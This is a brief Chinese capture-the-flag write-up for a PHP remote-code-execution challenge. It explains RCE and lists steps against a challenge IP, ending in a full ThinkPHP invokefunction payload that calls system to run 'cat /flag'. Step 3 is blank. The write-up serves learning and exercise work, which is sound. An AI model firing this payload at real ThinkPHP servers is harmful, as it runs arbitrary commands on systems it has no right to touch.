目录
一 ,php_rce
这事一道PHP远程代码执行漏洞题,RCE全称remote code execution,翻译成中文就是远程代码执行。是指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。
二,解题
1 进入试题
2 访问http://220.249.52.133:38152/index.php/aaa
页面报错,说明存在漏洞
3 访问
4 访问/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
三 ,总结
网络攻防总是在过滤和反过滤中挣扎。